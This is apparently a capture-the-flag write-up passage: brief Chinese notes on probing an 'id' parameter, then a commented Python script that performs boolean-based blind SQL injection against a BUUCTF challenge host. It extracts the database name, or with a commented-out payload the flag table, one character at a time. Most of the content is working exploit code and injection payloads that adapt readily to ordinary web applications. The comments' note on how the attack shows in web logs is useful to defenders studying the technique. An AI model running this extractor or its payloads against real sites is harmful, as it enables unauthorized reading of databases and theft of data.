id=0
id=1
id=2
id=3
发现结果不一样,尝试 : ">4","=4","<4" :
在自己的环境下验证一下:
爆一下数据库:
id=(ascii(substr(database(),1,1))>32)
'''
@Modify Time      @Author
------------      -------
2019/10/25 19:28  laoalo

Boolean-based blind SQL injection probe used in the write-up above.

Each POST sends an ``id`` value of the form ``(ascii(substr(<expr>,i,1))=j)``
and checks whether the fixed page string in ``flag`` comes back; a hit reveals
one character of ``database()`` (or, with the commented-out payload, of the
``flag`` table). Because every character costs up to 97 requests, the
characteristic trace in a web log is a burst of POSTs whose ``id`` parameter
contains ``ascii(substr(`` with only the two integers changing.
'''
import requests
from lxml import etree


def a() -> None:
    """Extract the current database name one character at a time and print it.

    Side effects: issues one HTTP POST per (position, candidate) pair to
    ``url`` and prints progress; returns nothing.
    """
    # Challenge instance from the write-up; this per-player UUID host is
    # specific to the BUUCTF deployment.
    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"
    # Oracle: the page text that appears only when the injected condition
    # is true. It is matched as a whole text node (see ``flag in html``
    # below), so it must equal one text() node exactly, not merely occur
    # somewhere in the page.
    flag="Hello, glzjin wants a girlfriend."
    # Characters recovered so far.
    final=""
    # Last ASCII value probed for the current position; used after the inner
    # loop to tell "no candidate matched" (end of the string) from "matched".
    stop=0
    # Position within the target string, 1-based as substr() expects; at most
    # 128 characters are attempted.
    for i in range(1,129):
        print("*"*50,i,"*"*50)
        stop=0
        # Candidate ASCII values 32..128 (printable range plus one), tested
        # linearly with an equality comparison.
        for j in range(32,129):
            stop = j
            data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}
            # Author's alternative target left in place: same probe against
            # the ``flag`` column instead of database().
            # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}
            # NOTE(review): local name ``re`` shadows the stdlib module name;
            # harmless here since ``re`` is not imported in this file.
            re = requests.post(url=url,data=data).text.replace('\n','')
            # All text nodes of the response; the oracle string is looked up
            # as a list element, i.e. exact match against one node.
            html = etree.HTML(re).xpath("//text()")
            print(">>",html)
            if flag in html:
                final+=chr(j)
                print("\n\t\t\t\t",final)
                break
        # ``stop`` stays at 128 when the inner loop ran to completion without
        # a hit, meaning no character exists at position i: stop. (It is also
        # 128 when the hit itself was j == 128, so that edge case ends the
        # run early.)
        if stop >= 128:
            print("*"*50,"结束")
            print(">>",final)
            break


if __name__ == '__main__':
    a()